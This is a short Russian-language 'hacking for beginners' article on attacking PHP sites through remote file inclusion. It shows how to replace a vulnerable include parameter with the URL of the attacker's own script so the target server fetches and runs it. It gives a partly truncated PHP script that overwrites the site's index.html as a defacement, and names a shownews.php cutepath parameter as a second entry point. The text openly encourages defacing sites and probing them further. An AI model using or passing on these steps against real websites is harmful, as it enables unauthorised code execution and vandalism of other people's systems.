Ошибки в php скриптах
[ Хакерство для новичков ]

В данной статье я постараюсь вам рассказать о взломе при помощи ошибок в скриптах, которые находятся на сервере. Именно таким методом пользуются известные Скрипт-кидди. В основе этого метода лежит не столько профессионализм хакеров, сколько глупость админов, так как порой попадаются довольно интересные вещи. Наиболее наглядным примером может служить такой: wwwadress.com/path.php?dir1/script1.php. Достаточно порсто взглянуть на такую схему, чтобы понять, что этот сайт явно подвержен известной болезни - глупости админа. Ведь поменяв адрес на такой: wwwadress.com/path.php?http://www.yoursite.ru/yourscript.php сервер просто выполнит указанный вами скрипт. А как известно, сделать можно с ситсемой что угодно. Для начала напишем простой скрипт, который будет имитировать нам командную строку, то есть при выполнении которого нам откроется для просмотра текущая директория.

Обычно такая уязвимость существует благодаря строчке в скрипте(Спасибо команде N0b0D1eS за информацию) include($path). Здесь значение path не проверяется, поэтому можно выполнять скрипты с других сайтов. Все, теперь пишем любой скрипт и дефейсим сайт, если нужно, если нет, то можно еще там покопаться и т.д. Вариант скрипта для дефейса:

Error 404! Admin not found!
";
$fp=fopen("../index.html","w");
flock($fp, 2);
fwrite($fp,$context);
flock($fp, 3);
fclose($fp);
?>

2-ой распространенный баг. Это ошибка в файле shownews.php. Заключается она в том, что этот скрипт выполняет файл config.php и позволяет указать путь к нему. Поэтому меняем адрес на wwwadress.com/shownews.php?cutepath=http://www.yoursite.ru/config.php где файл config.php представляет из себя уже сделанный нами скрипт для дефейса главной страницы.

Вот пока и все, большое спасибо команде N0b0D1eS за информацию, а всем остальным желаю дальнейших успехов в обучении.

Предоставил:
FIXER